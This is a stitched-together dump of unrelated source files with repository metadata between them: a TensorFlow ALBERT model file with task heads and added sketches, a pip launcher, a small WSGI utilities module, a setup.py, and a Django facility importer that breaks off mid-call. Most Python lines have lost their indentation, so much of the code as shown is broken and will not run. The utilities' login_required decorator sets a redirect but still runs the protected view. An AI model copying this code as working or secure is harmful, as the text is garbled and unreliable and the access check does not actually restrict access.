hidden_states=outputs.hidden_states,
attentions=outputs.attentions,
)
def serving_output(self, output: TFAlbertForPreTrainingOutput) -> TFAlbertForPreTrainingOutput:
hs = tf.convert_to_tensor(output.hidden_states) if self.config.output_hidden_states else None
attns = tf.convert_to_tensor(output.attentions) if self.config.output_attentions else None
return TFAlbertForPreTrainingOutput(
prediction_logits=output.prediction_logits,
sop_logits=output.sop_logits,
hidden_states=hs,
attentions=attns,
)
class TFAlbertSOPHead(tf.keras.layers.Layer):
def __init__(self, config: AlbertConfig, **kwargs):
super().__init__(**kwargs)
self.dropout = tf.keras.layers.Dropout(rate=config.classifier_dropout_prob)
self.classifier = tf.keras.layers.Dense(
units=config.num_labels,
kernel_initializer=get_initializer(config.initializer_range),
name="classifier",
)
def call(self, pooled_output: tf.Tensor, training: bool) -> tf.Tensor:
dropout_pooled_output = self.dropout(inputs=pooled_output, training=training)
logits = self.classifier(inputs=dropout_pooled_output)
return logits
@add_start_docstrings("""Albert Model with a `language modeling` head on top. """, ALBERT_START_DOCSTRING)
class TFAlbertForMaskedLM(TFAlbertPreTrainedModel, TFMaskedLanguageModelingLoss):
    # names with a '.' represent the authorized unexpected/missing layers when a TF model is loaded from a PT model
_keys_to_ignore_on_load_unexpected = [r"pooler", r"predictions.decoder.weight"]
def __init__(self, config: AlbertConfig, *inputs, **kwargs):
super().__init__(config, *inputs, **kwargs)
self.albert = TFAlbertMainLayer(config, add_pooling_layer=False, name="albert")
self.predictions = TFAlbertMLMHead(config, input_embeddings=self.albert.embeddings, name="predictions")
def get_lm_head(self) -> tf.keras.layers.Layer:
return self.predictions
@add_start_docstrings_to_model_forward(ALBERT_INPUTS_DOCSTRING.format("batch_size, sequence_length"))
@add_code_sample_docstrings(
tokenizer_class=_TOKENIZER_FOR_DOC,
checkpoint="albert-base-v2",
output_type=TFMaskedLMOutput,
config_class=_CONFIG_FOR_DOC,
)
def call(
self,
input_ids: Optional[TFModelInputType] = None,
attention_mask: Optional[Union[np.ndarray, tf.Tensor]] = None,
token_type_ids: Optional[Union[np.ndarray, tf.Tensor]] = None,
position_ids: Optional[Union[np.ndarray, tf.Tensor]] = None,
head_mask: Optional[Union[np.ndarray, tf.Tensor]] = None,
inputs_embeds: Optional[Union[np.ndarray, tf.Tensor]] = None,
output_attentions: Optional[bool] = None,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
labels: Optional[Union[np.ndarray, tf.Tensor]] = None,
training: Optional[bool] = False,
**kwargs,
) -> Union[TFMaskedLMOutput, Tuple[tf.Tensor]]:
r"""
labels (:obj:`tf.Tensor` of shape :obj:`(batch_size, sequence_length)`, `optional`):
Labels for computing the masked language modeling loss. Indices should be in ``[-100, 0, ...,
config.vocab_size]`` (see ``input_ids`` docstring) Tokens with indices set to ``-100`` are ignored
(masked), the loss is only computed for the tokens with labels in ``[0, ..., config.vocab_size]``
"""
inputs = input_processing(
func=self.call,
config=self.config,
input_ids=input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
labels=labels,
training=training,
kwargs_call=kwargs,
)
outputs = self.albert(
input_ids=inputs["input_ids"],
attention_mask=inputs["attention_mask"],
token_type_ids=inputs["token_type_ids"],
position_ids=inputs["position_ids"],
head_mask=inputs["head_mask"],
inputs_embeds=inputs["inputs_embeds"],
output_attentions=inputs["output_attentions"],
output_hidden_states=inputs["output_hidden_states"],
return_dict=inputs["return_dict"],
training=inputs["training"],
)
sequence_output = outputs[0]
prediction_scores = self.predictions(hidden_states=sequence_output, training=inputs["training"])
loss = (
None if inputs["labels"] is None else self.compute_loss(labels=inputs["labels"], logits=prediction_scores)
)
if not inputs["return_dict"]:
output = (prediction_scores,) + outputs[2:]
return ((loss,) + output) if loss is not None else output
return TFMaskedLMOutput(
loss=loss,
logits=prediction_scores,
hidden_states=outputs.hidden_states,
attentions=outputs.attentions,
)
# Copied from adj_tf.models.bert.modeling_tf_bert.TFBertForMaskedLM.serving_output
def serving_output(self, output: TFMaskedLMOutput) -> TFMaskedLMOutput:
hs = tf.convert_to_tensor(output.hidden_states) if self.config.output_hidden_states else None
attns = tf.convert_to_tensor(output.attentions) if self.config.output_attentions else None
return TFMaskedLMOutput(logits=output.logits, hidden_states=hs, attentions=attns)
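# --- Illustrative sketch (not part of the original file) ----------------------
# The `labels` docstring in TFAlbertForMaskedLM.call above states that positions
# set to -100 are ignored by the masked-LM loss. A minimal sketch of building
# such labels for one sequence (the token ids and masked position are made up):
def _demo_mlm_labels(original_ids, masked_positions):
    """Keep the original token id where the input was masked, -100 everywhere else."""
    return [
        token_id if position in masked_positions else -100
        for position, token_id in enumerate(original_ids)
    ]
# _demo_mlm_labels([2, 10975, 15, 51, 3], {2}) -> [-100, -100, 15, -100, -100]
# -------------------------------------------------------------------------------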
@add_start_docstrings(
"""
Albert Model transformer with a sequence classification/regression head on top (a linear layer on top of the pooled
output) e.g. for GLUE tasks.
""",
ALBERT_START_DOCSTRING,
)
class TFAlbertForSequenceClassification(TFAlbertPreTrainedModel, TFSequenceClassificationLoss):
    # names with a '.' represent the authorized unexpected/missing layers when a TF model is loaded from a PT model
_keys_to_ignore_on_load_unexpected = [r"predictions"]
_keys_to_ignore_on_load_missing = [r"dropout"]
def __init__(self, config: AlbertConfig, *inputs, **kwargs):
super().__init__(config, *inputs, **kwargs)
self.num_labels = config.num_labels
self.albert = TFAlbertMainLayer(config, name="albert")
self.dropout = tf.keras.layers.Dropout(rate=config.classifier_dropout_prob)
self.classifier = tf.keras.layers.Dense(
units=config.num_labels, kernel_initializer=get_initializer(config.initializer_range), name="classifier"
)
@add_start_docstrings_to_model_forward(ALBERT_INPUTS_DOCSTRING.format("batch_size, sequence_length"))
@add_code_sample_docstrings(
tokenizer_class=_TOKENIZER_FOR_DOC,
checkpoint="albert-base-v2",
output_type=TFSequenceClassifierOutput,
config_class=_CONFIG_FOR_DOC,
)
def call(
self,
input_ids: Optional[TFModelInputType] = None,
attention_mask: Optional[Union[np.ndarray, tf.Tensor]] = None,
token_type_ids: Optional[Union[np.ndarray, tf.Tensor]] = None,
position_ids: Optional[Union[np.ndarray, tf.Tensor]] = None,
head_mask: Optional[Union[np.ndarray, tf.Tensor]] = None,
inputs_embeds: Optional[Union[np.ndarray, tf.Tensor]] = None,
output_attentions: Optional[bool] = None,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
labels: Optional[Union[np.ndarray, tf.Tensor]] = None,
training: Optional[bool] = False,
**kwargs,
) -> Union[TFSequenceClassifierOutput, Tuple[tf.Tensor]]:
r"""
labels (:obj:`tf.Tensor` of shape :obj:`(batch_size,)`, `optional`):
Labels for computing the sequence classification/regression loss. Indices should be in ``[0, ...,
config.num_labels - 1]``. If ``config.num_labels == 1`` a regression loss is computed (Mean-Square loss),
If ``config.num_labels > 1`` a classification loss is computed (Cross-Entropy).
"""
inputs = input_processing(
func=self.call,
config=self.config,
input_ids=input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
labels=labels,
training=training,
kwargs_call=kwargs,
)
outputs = self.albert(
input_ids=inputs["input_ids"],
attention_mask=inputs["attention_mask"],
token_type_ids=inputs["token_type_ids"],
position_ids=inputs["position_ids"],
head_mask=inputs["head_mask"],
inputs_embeds=inputs["inputs_embeds"],
output_attentions=inputs["output_attentions"],
output_hidden_states=inputs["output_hidden_states"],
return_dict=inputs["return_dict"],
training=inputs["training"],
)
pooled_output = outputs[1]
pooled_output = self.dropout(inputs=pooled_output, training=inputs["training"])
logits = self.classifier(inputs=pooled_output)
loss = None if inputs["labels"] is None else self.compute_loss(labels=inputs["labels"], logits=logits)
if not inputs["return_dict"]:
output = (logits,) + outputs[2:]
return ((loss,) + output) if loss is not None else output
return TFSequenceClassifierOutput(
loss=loss,
logits=logits,
hidden_states=outputs.hidden_states,
attentions=outputs.attentions,
)
# Copied from adj_tf.models.bert.modeling_tf_bert.TFBertForSequenceClassification.serving_output
def serving_output(self, output: TFSequenceClassifierOutput) -> TFSequenceClassifierOutput:
hs = tf.convert_to_tensor(output.hidden_states) if self.config.output_hidden_states else None
attns = tf.convert_to_tensor(output.attentions) if self.config.output_attentions else None
return TFSequenceClassifierOutput(logits=output.logits, hidden_states=hs, attentions=attns)
@add_start_docstrings(
"""
Albert Model with a token classification head on top (a linear layer on top of the hidden-states output) e.g. for
Named-Entity-Recognition (NER) tasks.
""",
ALBERT_START_DOCSTRING,
)
class TFAlbertForTokenClassification(TFAlbertPreTrainedModel, TFTokenClassificationLoss):
    # names with a '.' represent the authorized unexpected/missing layers when a TF model is loaded from a PT model
_keys_to_ignore_on_load_unexpected = [r"pooler", r"predictions"]
_keys_to_ignore_on_load_missing = [r"dropout"]
def __init__(self, config: AlbertConfig, *inputs, **kwargs):
super().__init__(config, *inputs, **kwargs)
self.num_labels = config.num_labels
self.albert = TFAlbertMainLayer(config, add_pooling_layer=False, name="albert")
self.dropout = tf.keras.layers.Dropout(rate=config.hidden_dropout_prob)
self.classifier = tf.keras.layers.Dense(
units=config.num_labels, kernel_initializer=get_initializer(config.initializer_range), name="classifier"
)
@add_start_docstrings_to_model_forward(ALBERT_INPUTS_DOCSTRING.format("batch_size, sequence_length"))
@add_code_sample_docstrings(
tokenizer_class=_TOKENIZER_FOR_DOC,
checkpoint="albert-base-v2",
output_type=TFTokenClassifierOutput,
config_class=_CONFIG_FOR_DOC,
)
def call(
self,
input_ids: Optional[TFModelInputType] = None,
attention_mask: Optional[Union[np.ndarray, tf.Tensor]] = None,
token_type_ids: Optional[Union[np.ndarray, tf.Tensor]] = None,
position_ids: Optional[Union[np.ndarray, tf.Tensor]] = None,
head_mask: Optional[Union[np.ndarray, tf.Tensor]] = None,
inputs_embeds: Optional[Union[np.ndarray, tf.Tensor]] = None,
output_attentions: Optional[bool] = None,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
labels: Optional[Union[np.ndarray, tf.Tensor]] = None,
training: Optional[bool] = False,
**kwargs,
) -> Union[TFTokenClassifierOutput, Tuple[tf.Tensor]]:
r"""
labels (:obj:`tf.Tensor` of shape :obj:`(batch_size, sequence_length)`, `optional`):
Labels for computing the token classification loss. Indices should be in ``[0, ..., config.num_labels -
1]``.
"""
inputs = input_processing(
func=self.call,
config=self.config,
input_ids=input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
labels=labels,
training=training,
kwargs_call=kwargs,
)
outputs = self.albert(
input_ids=inputs["input_ids"],
attention_mask=inputs["attention_mask"],
token_type_ids=inputs["token_type_ids"],
position_ids=inputs["position_ids"],
head_mask=inputs["head_mask"],
inputs_embeds=inputs["inputs_embeds"],
output_attentions=inputs["output_attentions"],
output_hidden_states=inputs["output_hidden_states"],
            return_dict=inputs["return_dict"],
training=inputs["training"],
)
sequence_output = outputs[0]
sequence_output = self.dropout(inputs=sequence_output, training=inputs["training"])
logits = self.classifier(inputs=sequence_output)
loss = None if inputs["labels"] is None else self.compute_loss(labels=inputs["labels"], logits=logits)
if not inputs["return_dict"]:
output = (logits,) + outputs[2:]
return ((loss,) + output) if loss is not None else output
return TFTokenClassifierOutput(
loss=loss,
logits=logits,
hidden_states=outputs.hidden_states,
attentions=outputs.attentions,
)
# Copied from adj_tf.models.bert.modeling_tf_bert.TFBertForTokenClassification.serving_output
def serving_output(self, output: TFTokenClassifierOutput) -> TFTokenClassifierOutput:
hs = tf.convert_to_tensor(output.hidden_states) if self.config.output_hidden_states else None
attns = tf.convert_to_tensor(output.attentions) if self.config.output_attentions else None
return TFTokenClassifierOutput(logits=output.logits, hidden_states=hs, attentions=attns)
@add_start_docstrings(
"""
Albert Model with a span classification head on top for extractive question-answering tasks like SQuAD (a linear
layer on top of the hidden-states output to compute `span start logits` and `span end logits`).
""",
ALBERT_START_DOCSTRING,
)
class TFAlbertForQuestionAnswering(TFAlbertPreTrainedModel, TFQuestionAnsweringLoss):
    # names with a '.' represent the authorized unexpected/missing layers when a TF model is loaded from a PT model
_keys_to_ignore_on_load_unexpected = [r"pooler", r"predictions"]
def __init__(self, config: AlbertConfig, *inputs, **kwargs):
super().__init__(config, *inputs, **kwargs)
self.num_labels = config.num_labels
self.albert = TFAlbertMainLayer(config, add_pooling_layer=False, name="albert")
self.qa_outputs = tf.keras.layers.Dense(
units=config.num_labels, kernel_initializer=get_initializer(config.initializer_range), name="qa_outputs"
)
@add_start_docstrings_to_model_forward(ALBERT_INPUTS_DOCSTRING.format("batch_size, sequence_length"))
@add_code_sample_docstrings(
tokenizer_class=_TOKENIZER_FOR_DOC,
checkpoint="albert-base-v2",
output_type=TFQuestionAnsweringModelOutput,
config_class=_CONFIG_FOR_DOC,
)
def call(
self,
input_ids: Optional[TFModelInputType] = None,
attention_mask: Optional[Union[np.ndarray, tf.Tensor]] = None,
token_type_ids: Optional[Union[np.ndarray, tf.Tensor]] = None,
position_ids: Optional[Union[np.ndarray, tf.Tensor]] = None,
head_mask: Optional[Union[np.ndarray, tf.Tensor]] = None,
inputs_embeds: Optional[Union[np.ndarray, tf.Tensor]] = None,
output_attentions: Optional[bool] = None,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
start_positions: Optional[Union[np.ndarray, tf.Tensor]] = None,
end_positions: Optional[Union[np.ndarray, tf.Tensor]] = None,
training: Optional[bool] = False,
**kwargs,
) -> Union[TFQuestionAnsweringModelOutput, Tuple[tf.Tensor]]:
r"""
start_positions (:obj:`tf.Tensor` of shape :obj:`(batch_size,)`, `optional`):
Labels for position (index) of the start of the labelled span for computing the token classification loss.
Positions are clamped to the length of the sequence (:obj:`sequence_length`). Position outside of the
sequence are not taken into account for computing the loss.
end_positions (:obj:`tf.Tensor` of shape :obj:`(batch_size,)`, `optional`):
Labels for position (index) of the end of the labelled span for computing the token classification loss.
Positions are clamped to the length of the sequence (:obj:`sequence_length`). Position outside of the
sequence are not taken into account for computing the loss.
"""
inputs = input_processing(
func=self.call,
config=self.config,
input_ids=input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
start_positions=start_positions,
end_positions=end_positions,
training=training,
kwargs_call=kwargs,
)
outputs = self.albert(
input_ids=inputs["input_ids"],
attention_mask=inputs["attention_mask"],
token_type_ids=inputs["token_type_ids"],
position_ids=inputs["position_ids"],
head_mask=inputs["head_mask"],
inputs_embeds=inputs["inputs_embeds"],
output_attentions=inputs["output_attentions"],
output_hidden_states=inputs["output_hidden_states"],
return_dict=inputs["return_dict"],
training=inputs["training"],
)
sequence_output = outputs[0]
logits = self.qa_outputs(inputs=sequence_output)
start_logits, end_logits = tf.split(value=logits, num_or_size_splits=2, axis=-1)
start_logits = tf.squeeze(input=start_logits, axis=-1)
end_logits = tf.squeeze(input=end_logits, axis=-1)
loss = None
if inputs["start_positions"] is not None and inputs["end_positions"] is not None:
labels = {"start_position": inputs["start_positions"]}
labels["end_position"] = inputs["end_positions"]
loss = self.compute_loss(labels=labels, logits=(start_logits, end_logits))
if not inputs["return_dict"]:
output = (start_logits, end_logits) + outputs[2:]
return ((loss,) + output) if loss is not None else output
return TFQuestionAnsweringModelOutput(
loss=loss,
start_logits=start_logits,
end_logits=end_logits,
hidden_states=outputs.hidden_states,
attentions=outputs.attentions,
)
# Copied from adj_tf.models.bert.modeling_tf_bert.TFBertForQuestionAnswering.serving_output
def serving_output(self, output: TFQuestionAnsweringModelOutput) -> TFQuestionAnsweringModelOutput:
hs = tf.convert_to_tensor(output.hidden_states) if self.config.output_hidden_states else None
attns = tf.convert_to_tensor(output.attentions) if self.config.output_attentions else None
return TFQuestionAnsweringModelOutput(
start_logits=output.start_logits, end_logits=output.end_logits, hidden_states=hs, attentions=attns
)
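# --- Illustrative sketch (not part of the original file) ----------------------
# TFAlbertForQuestionAnswering.call above splits the (batch, seq_length, 2) output
# into per-token start and end logits. A minimal sketch of decoding a span with a
# plain argmax, ignoring the usual start <= end and max-length checks (the tokens
# and logits are made up):
def _demo_decode_span(start_logits, end_logits, tokens):
    start = max(range(len(start_logits)), key=lambda i: start_logits[i])
    end = max(range(len(end_logits)), key=lambda i: end_logits[i])
    return " ".join(tokens[start:end + 1])
# _demo_decode_span([0.1, 2.0, 0.3], [0.2, 0.1, 1.5], ["a", "nice", "puppet"]) -> "nice puppet"
# -------------------------------------------------------------------------------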
@add_start_docstrings(
"""
Albert Model with a multiple choice classification head on top (a linear layer on top of the pooled output and a
softmax) e.g. for RocStories/SWAG tasks.
""",
ALBERT_START_DOCSTRING,
)
class TFAlbertForMultipleChoice(TFAlbertPreTrainedModel, TFMultipleChoiceLoss):
    # names with a '.' represent the authorized unexpected/missing layers when a TF model is loaded from a PT model
_keys_to_ignore_on_load_unexpected = [r"pooler", r"predictions"]
_keys_to_ignore_on_load_missing = [r"dropout"]
def __init__(self, config: AlbertConfig, *inputs, **kwargs):
super().__init__(config, *inputs, **kwargs)
self.albert = TFAlbertMainLayer(config, name="albert")
self.dropout = tf.keras.layers.Dropout(rate=config.hidden_dropout_prob)
self.classifier = tf.keras.layers.Dense(
units=1, kernel_initializer=get_initializer(config.initializer_range), name="classifier"
)
@property
def dummy_inputs(self):
"""
Dummy inputs to build the network.
Returns:
tf.Tensor with dummy inputs
"""
return {"input_ids": tf.constant(MULTIPLE_CHOICE_DUMMY_INPUTS)}
@add_start_docstrings_to_model_forward(ALBERT_INPUTS_DOCSTRING.format("batch_size, num_choices, sequence_length"))
@add_code_sample_docstrings(
tokenizer_class=_TOKENIZER_FOR_DOC,
checkpoint="albert-base-v2",
output_type=TFMultipleChoiceModelOutput,
config_class=_CONFIG_FOR_DOC,
)
def call(
self,
input_ids: Optional[TFModelInputType] = None,
attention_mask: Optional[Union[np.ndarray, tf.Tensor]] = None,
token_type_ids: Optional[Union[np.ndarray, tf.Tensor]] = None,
position_ids: Optional[Union[np.ndarray, tf.Tensor]] = None,
head_mask: Optional[Union[np.ndarray, tf.Tensor]] = None,
inputs_embeds: Optional[Union[np.ndarray, tf.Tensor]] = None,
output_attentions: Optional[bool] = None,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
labels: Optional[Union[np.ndarray, tf.Tensor]] = None,
training: Optional[bool] = False,
**kwargs,
) -> Union[TFMultipleChoiceModelOutput, Tuple[tf.Tensor]]:
r"""
labels (:obj:`tf.Tensor` of shape :obj:`(batch_size,)`, `optional`):
Labels for computing the multiple choice classification loss. Indices should be in ``[0, ...,
num_choices]`` where :obj:`num_choices` is the size of the second dimension of the input tensors. (See
:obj:`input_ids` above)
"""
inputs = input_processing(
func=self.call,
config=self.config,
input_ids=input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
labels=labels,
training=training,
kwargs_call=kwargs,
)
if inputs["input_ids"] is not None:
num_choices = shape_list(inputs["input_ids"])[1]
seq_length = shape_list(inputs["input_ids"])[2]
else:
num_choices = shape_list(inputs["inputs_embeds"])[1]
seq_length = shape_list(inputs["inputs_embeds"])[2]
flat_input_ids = tf.reshape(inputs["input_ids"], (-1, seq_length)) if inputs["input_ids"] is not None else None
flat_attention_mask = (
tf.reshape(tensor=inputs["attention_mask"], shape=(-1, seq_length))
if inputs["attention_mask"] is not None
else None
)
flat_token_type_ids = (
tf.reshape(tensor=inputs["token_type_ids"], shape=(-1, seq_length))
if inputs["token_type_ids"] is not None
else None
)
flat_position_ids = (
            tf.reshape(tensor=inputs["position_ids"], shape=(-1, seq_length)) if inputs["position_ids"] is not None else None
)
flat_inputs_embeds = (
tf.reshape(tensor=inputs["inputs_embeds"], shape=(-1, seq_length, shape_list(inputs["inputs_embeds"])[3]))
if inputs["inputs_embeds"] is not None
else None
)
outputs = self.albert(
input_ids=flat_input_ids,
attention_mask=flat_attention_mask,
token_type_ids=flat_token_type_ids,
position_ids=flat_position_ids,
head_mask=inputs["head_mask"],
inputs_embeds=flat_inputs_embeds,
output_attentions=inputs["output_attentions"],
output_hidden_states=inputs["output_hidden_states"],
return_dict=inputs["return_dict"],
training=inputs["training"],
)
pooled_output = outputs[1]
pooled_output = self.dropout(inputs=pooled_output, training=inputs["training"])
logits = self.classifier(inputs=pooled_output)
reshaped_logits = tf.reshape(tensor=logits, shape=(-1, num_choices))
loss = None if inputs["labels"] is None else self.compute_loss(labels=inputs["labels"], logits=reshaped_logits)
if not inputs["return_dict"]:
output = (reshaped_logits,) + outputs[2:]
return ((loss,) + output) if loss is not None else output
return TFMultipleChoiceModelOutput(
loss=loss,
logits=reshaped_logits,
hidden_states=outputs.hidden_states,
attentions=outputs.attentions,
)
@tf.function(
input_signature=[
{
"input_ids": tf.TensorSpec((None, None, None), tf.int32, name="input_ids"),
"attention_mask": tf.TensorSpec((None, None, None), tf.int32, name="attention_mask"),
"token_type_ids": tf.TensorSpec((None, None, None), tf.int32, name="token_type_ids"),
}
]
)
# Copied from adj_tf.models.bert.modeling_tf_bert.TFBertForMultipleChoice.serving
def serving(self, inputs: Dict[str, tf.Tensor]) -> TFMultipleChoiceModelOutput:
output = self.call(input_ids=inputs)
return self.serving_output(output)
# Copied from adj_tf.models.bert.modeling_tf_bert.TFBertForMultipleChoice.serving_output
def serving_output(self, output: TFMultipleChoiceModelOutput) -> TFMultipleChoiceModelOutput:
hs = tf.convert_to_tensor(output.hidden_states) if self.config.output_hidden_states else None
attns = tf.convert_to_tensor(output.attentions) if self.config.output_attentions else None
return TFMultipleChoiceModelOutput(logits=output.logits, hidden_states=hs, attentions=attns)
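# --- Illustrative sketch (not part of the original file) ----------------------
# TFAlbertForMultipleChoice.call above flattens (batch_size, num_choices, seq_length)
# inputs into (batch_size * num_choices, seq_length) rows, scores each row with a
# single-unit classifier, and reshapes the logits back to (batch_size, num_choices).
# A minimal shape sketch with made-up sizes:
def _demo_multiple_choice_shapes(batch_size=2, num_choices=4, seq_length=16):
    flat_rows = batch_size * num_choices
    encoder_input_shape = (flat_rows, seq_length)   # what the shared encoder sees
    classifier_output_shape = (flat_rows, 1)        # one logit per (example, choice) row
    reshaped_logits_shape = (batch_size, num_choices)
    return encoder_input_shape, classifier_output_shape, reshaped_logits_shape
# _demo_multiple_choice_shapes() -> ((8, 16), (8, 1), (2, 4))
# -------------------------------------------------------------------------------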
|
[
"[email protected]"
] | |
d3b8e62fee8dbdb31c0ad6e0e6956cf3d36fa35b
|
1a31fce39e8c83e32a79389132867a048518d3b9
|
/backend/venv/bin/pip
|
5a1e94108c38ab27cca4c3a7946035206bc8d128
|
[] |
no_license
|
ziminyuri/Verbal-Decision-Analysis-SNOD
|
54f3c5dfa57204e69f126799aea8455985233aac
|
f580794c9a902a887d05e97597c7ddb5de36c2d5
|
refs/heads/master
| 2023-03-13T05:12:17.696971 | 2021-02-11T13:17:42 | 2021-02-11T13:17:42 | 297,934,295 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 288 |
#!/Users/zimin/Documents/GitHub/Verbal-Decision-Analysis-SNOD/backend/venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from pip._internal.cli.main import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"[email protected]"
] | ||
2626379928ce4d207789a77c1bcc5ed5fb915ad1
|
5d9b7e117373d14d3ee720b33848b7e4c0d06e5a
|
/spaghettibin/mainapp/patterns/utils.py
|
8c458ac1e1516af2637ddb0d703209f6b3ca6366
|
[] |
no_license
|
loneloon/spaghettibin
|
36873fc56175b6ae44165ce3ed0f65c84e63f4e3
|
6e4c0e3961cdfb1b22775d4b1290f1671fb79ca9
|
refs/heads/main
| 2023-03-01T01:54:01.075530 | 2021-02-16T05:48:58 | 2021-02-16T05:48:58 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,412 |
py
|
import re
signin_link = '/signin/'
def parse_queries(data: str):
result = {}
if data:
if '&' in data:
params = data.split('&')
else:
params = data.split('\r\n')
while '' in params:
params.remove('')
for item in params:
key, value = item.split('=')
result[key] = value
return result
def parse_input_data(data: bytes) -> str:
if data:
data_str = data.decode(encoding="utf-8")
return data_str
else:
return ''
def get_input_data(env) -> bytes:
content_length_data = env.get('CONTENT_LENGTH')
content_length = int(content_length_data) if content_length_data else 0
data = env['wsgi.input'].read(content_length) if content_length > 0 else b''
return data
def add_url(cls, path, view):
try:
cls.routes[path] = view
except Exception as e:
print(e)
def not_found_404_view(request, site=None, db=None):
return '404 BAD', [b'404 Page Not Found']
def bad_request(request=None, site=None, db=None):
return '404 BAD', [b'404 Bad Request, Buddy']
def redirect_302(url):
return '302', url
def is_logged_in(request, session_model, user_model, db):
session = db.get_object(model=session_model, cookie=request['cookie'])
if session:
user = db.get_object(model=user_model, id=session.user_fk)
if user:
return {'name': user.name, 'super': user.is_superuser}
else:
return None
def make_form_from_model(model, exclude=None):
items = []
try:
for key in model.__slots__:
included = True
if exclude is not None:
for tag in exclude:
if '_' in tag:
if tag in key:
included = False
else:
if tag == key:
included = False
if included:
items.append(key)
except Exception as e:
print(e)
return items
def harvest_db_obj(db_response):
result = None
try:
if db_response is not None:
            if isinstance(db_response, (list, tuple)):
result = list(dict((k, v)
for k, v in obj.__dict__.items()
if not k.startswith('_'))
for obj in db_response)
else:
result = dict((k, v)
for k, v in db_response.__dict__.items()
if not k.startswith('_'))
else:
result = None
except Exception as e:
print(e)
finally:
return result
def slice_path(source):
try:
source = source.split('/')
while '' in source:
source.remove('')
return source
except Exception as e:
print(e)
return []
def re_match_view(path, routes, alt):
view = alt
for key, value in routes.items():
if re.fullmatch(key, path):
view = value
return view
def compile_request(environ):
request = {
'path': environ['PATH_INFO'],
'method': environ['REQUEST_METHOD'],
'cookie': environ['HTTP_COOKIE'].split('=')[-1],
'next': ""
}
if request['method'] == 'GET':
request['queries'] = parse_queries(environ['QUERY_STRING'])
else:
request['queries'] = parse_queries(parse_input_data(get_input_data(environ)))
if 'next' in request['queries'].keys():
request['next'] = request['queries'].pop('next')
return request
def login_required(view):
def wrapper(*args, **kwargs):
if 'request' not in kwargs.keys():
request = args[1]
else:
request = kwargs['request']
if not request['user']:
request['next'] = signin_link
return view(*args, **kwargs)
return wrapper
def admin_required(view):
def wrapper(*args, **kwargs):
if 'request' not in kwargs.keys():
request = args[1]
else:
request = kwargs['request']
if not request['user']:
request['next'] = signin_link
else:
if not request['user']['super']:
return redirect_302('/')
return view(*args, **kwargs)
    return wrapper
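# --- Illustrative sketch (not part of the original file) ----------------------
# parse_queries above accepts either an "a=1&b=2" query string or CRLF-separated
# form data; both forms decode to the same dict. A minimal usage sketch:
def _demo_parse_queries():
    assert parse_queries("name=spam&password=eggs") == {"name": "spam", "password": "eggs"}
    assert parse_queries("name=spam\r\npassword=eggs") == {"name": "spam", "password": "eggs"}
# -------------------------------------------------------------------------------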
|
[
"[email protected]"
] | |
b31ccd4b4007cb4ee5b887a84613fa6b8a303ae4
|
0211132a35d1fb990a061ab28eec3b00363c7c42
|
/setup.py
|
20144d27c7e4b35114002a3455cf25664c086e8e
|
[
"BSD-3-Clause"
] |
permissive
|
victordeleau/codae
|
bb312fa006683e496c8dc41da84fd22202db57a7
|
d5b8351334df64b30b3f6929c934a936b66ed963
|
refs/heads/master
| 2022-11-27T21:05:56.773564 | 2020-07-25T15:24:31 | 2020-07-25T15:24:31 | 178,262,644 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 113 |
py
|
from setuptools import setup, find_packages
setup(
name='codae',
version='1.0',
packages=["codae"]
)
|
[
"[email protected]"
] | |
39d331e59d88c829c46113d50cfb446786f0fdfa
|
0d78474be6255f053d69d081d69caed76e46fe48
|
/aol/facilities/models.py
|
faab6649b33bb74829f6a6998b92ca45b8eba82b
|
[] |
no_license
|
conwayb/aol
|
5eff86ce1addaeb82d6437d1f548409e2b962e6e
|
d29538a502d028574e142baca508db5bfc4430ca
|
refs/heads/master
| 2020-04-05T21:32:20.035371 | 2016-11-04T23:59:04 | 2016-11-04T23:59:04 | 12,762,715 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,885 |
py
|
import requests
from django.contrib.gis.db import models
from django.contrib.gis.gdal import CoordTransform, SpatialReference
from django.contrib.gis.geos import Point
from django.db import transaction
class FacilityManager(models.Manager):
def to_kml(self, bbox):
return Facility.objects.all().extra(
select={'kml': 'st_askml(the_geom)'},
where=[
"the_geom && st_setsrid(st_makebox2d(st_point(%s, %s), st_point(%s, %s)), 3644)",
],
params=bbox
)
def reimport(self):
"""
Connects to the Oregon facility JSON endpoint and reimports all the
facilities
"""
response = requests.get("https://data.oregon.gov/resource/spxe-q5vj.json")
js = response.json()
# the data source uses WGS84 coords, so we have to transform them
gcoord = SpatialReference(4326)
mycoord = SpatialReference(3644)
trans = CoordTransform(gcoord, mycoord)
with transaction.atomic():
            # wipe out the existing facilities
Facility.objects.all().delete()
for row in js:
try:
p = Point(float(row['location']['longitude']), float(row['location']['latitude']), srid=4326)
except KeyError:
continue
p.transform(trans)
f = Facility(
name=row['boating_facility_name'],
managed_by=row.get('managed_by', ''),
